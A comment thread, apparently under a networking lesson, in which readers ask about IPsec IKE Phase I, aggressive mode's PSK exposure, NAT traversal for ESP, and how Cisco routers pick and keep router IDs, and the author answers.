Glad to hear you liked it. I wouldn’t use aggressive mode, it has a security risk since the hash is sent in clear text. There are tools that retrieve the PSK when the 3 messages are captured. You almost don’t notice the speed difference…

Hi. Just to confirm I am reading this correctly for IKE Phase I ISAKMP process it is used to build the secure tunnel for the Phase II, but it and of itself is not securing the information/parameters/valued exchanged under phase I?

Thank you for a great explanation.
I was wondering if you can touch on Nat Traversal. I don’t quite understand what you mean (required when your IPsec peer is behind a NAT router).
Does this mean if i’m doing a site - to -site from my firewall and my peer is a router NAT-T will need to be enabled? Can this feature be enabled on a
firewall?

@Abdool I’ll add something on NAT traversal later. Let’s say you want to establish an IPsec ESP VPN between two firewalls, one of them is behind a router that is configured for NAT. ESP doesn’t have any port numbers so your NAT device won’t be able to store any in its NAT table. NAT traversal solves this problem by encapsulating ESP traffic with an UDP header. The UDP header will then be translated with NAT.

There’s a bit more to this story but that might be nice for a future lesson

I’m not quite sure what you mean by identities on Cisco devices. Are you referring to Router ID when configuring routing protocols? If so, it is a good idea to change the Router ID because of the following reason:

If a Router ID is not explicitly configured, the router will choose the highest active IPv4 address of an interface on the device. If for whatever reason this interface goes down, the Router ID will change and thus the routing protocol will be disrupted, possibly requiring reconvergence. Explicitly configured Router IDs do not change and are not affected by the status of interfaces.

Secondly, if you are using IPv6, and there are no active interfaces with IPv4 addresses assigned, dynamic routing protocols will not function until you have explicitly configured a Router ID. Remember, router IDs are in the format of IPv4 addresses.

Finally, another option is to configure a Loopback interface with a specific IPv4 address. If it is the highest address, it will be used as the Router ID. And since loopback interfaces cannot go down unless they are manually shutdown, you will not have a problem with interfaces going down and Router IDs changing.